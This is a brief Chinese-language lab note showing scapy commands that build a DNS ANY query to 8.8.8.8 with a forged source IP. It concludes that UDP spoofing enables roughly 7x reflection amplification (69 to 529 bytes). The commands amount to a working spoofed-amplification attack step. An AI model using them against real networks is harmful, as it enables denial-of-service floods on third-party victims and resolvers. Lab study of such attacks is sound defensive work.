准备2台机器
172.28.6.132 发包伪造133机器源IP
172.28.6.133 收包
构造IP数据包
利用scapy
工具构造IP数据包
构造过程如下:
$ sudo scapy
$ >>> i=IP()
$ >>> i.src="172.28.6.133"
$ >>> i.dst="8.8.8.8"
$ >>> u=UDP()
$ >>> d=DNS()
$ >>> d.qdcount=1
$ >>> dr=DNSQR()
$ >>> dr.qname="baidu.com"
$ >>> dr.qtype=255
$ >>> d.qd=dr
$ >>> r=(i/u/d)
$ >>> r.display()
###[ IP ]###
version = 4
ihl = None
tos = 0x0
len = None
id = 1
flags =
frag = 0
ttl = 64
proto = udp
chksum = None
src = 172.28.6.133
dst = 8.8.8.8
\options \
###[ UDP ]###
sport = domain
dport = domain
len = None
chksum = None
###[ DNS ]###
id = 0
qr = 0
opcode = QUERY
aa = 0
tc = 0
rd = 1
ra = 0
z = 0
ad = 0
cd = 0
rcode = ok
qdcount = 1
ancount = 0
nscount = 0
arcount = 0
\qd \
|###[ DNS Question Record ]###
| qname = 'baidu.com'
| qtype = ALL
| qclass = IN
an = None
ns = None
ar = None
$ >>> sr1(r) // 发包
抓包显示
- 发包机器
- 收包机器
总结
由上可以看到,udp可以轻易的实现篡改源IP的操作,从而可以利用一些应用和协议的问题进行放大操作,例如上面发包的69byte的包,最后打到目标机器有529byte,从而放大了7倍多。